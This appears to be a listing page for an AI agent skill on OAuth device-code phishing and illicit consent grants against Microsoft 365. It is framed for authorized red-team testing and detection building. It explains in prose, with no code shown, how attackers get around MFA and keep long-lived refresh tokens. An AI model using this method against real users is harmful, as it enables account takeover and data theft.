attacking-oauth-with-device-code-phishing

Installation
SKILL.md

Attacking OAuth with Device-Code Phishing

Legal Notice: This skill is for authorized security testing, red-team engagements, and educational purposes only. Device-code and consent-grant phishing manipulate real users into authorizing attacker-controlled access to corporate identities. Execute only against tenants you own or have explicit written authorization (rules of engagement) to test. Unauthorized use violates the Computer Fraud and Abuse Act and equivalent laws worldwide.

Overview

The OAuth 2.0 Device Authorization Grant (RFC 8628) was designed for input-constrained devices (smart TVs, CLI tools) that cannot easily present a browser-based login. A device requests a short user_code and a device_code, displays the user_code and a verification URL to the user, and polls the token endpoint while the user authenticates on a separate, fully-featured device. Attackers weaponize this flow: instead of a smart TV, the "device" is the attacker's machine. The attacker initiates the device-code request, then phishes a victim to visit the legitimate Microsoft verification page (https://microsoft.com/devicelogin) and enter the attacker-generated user_code. Because the victim authenticates on the genuine Microsoft login page — completing MFA — the resulting tokens are minted to the attacker's polling session. This bypasses MFA entirely: the second factor is satisfied by the victim, but the bearer tokens land with the attacker (mapped to MITRE ATT&CK T1528 – Steal Application Access Token).

Microsoft Threat Intelligence, Volexity, and Proofpoint documented sharp growth in device-code phishing through 2025, with Russia-aligned actors (tracked by Microsoft as Storm-2372) among the most prolific. Mandiant's M-Trends reporting similarly highlights OAuth token theft as a leading cloud initial-access vector. A closely related technique is the illicit consent grant ("OAuth phishing"): the attacker registers a multi-tenant app and tricks the victim into clicking an /adminconsent or user-consent URL, granting the malicious app delegated Microsoft Graph permissions (Mail.Read, Files.ReadWrite.All, offline_access) that persist independently of password resets. This skill covers both, plus token replay across Microsoft 365 services using TokenTactics and validation/access mapping with ROADtools.

The defining property red teams exploit: access tokens minted via the device-code flow are valid for roughly 60–90 minutes, but the accompanying refresh token (with offline_access scope) survives for up to 90 days and can be redeemed for fresh tokens against any first-party resource the client is allowed to request — Outlook, SharePoint, Teams, Azure Resource Manager — enabling durable, MFA-surviving access.

When to Use

  • During an authorized red-team or assumed-breach engagement targeting Microsoft 365 / Entra ID where social-engineering is in scope
  • When validating Conditional Access policies, MFA enforcement, and token-protection controls against real phishing techniques
  • When testing whether an organization restricts the OAuth device-code flow or blocks unverified multi-tenant app consent
  • When demonstrating MFA-bypass risk to justify phishing-resistant authentication (FIDO2) and token-binding controls
  • When building detections (paired with the blue-team hunting-saas-sso-token-abuse skill) and you need realistic telemetry
Installs
46
GitHub Stars
24.2K
First Seen
12 days ago
attacking-oauth-with-device-code-phishing — mukul975/anthropic-cybersecurity-skills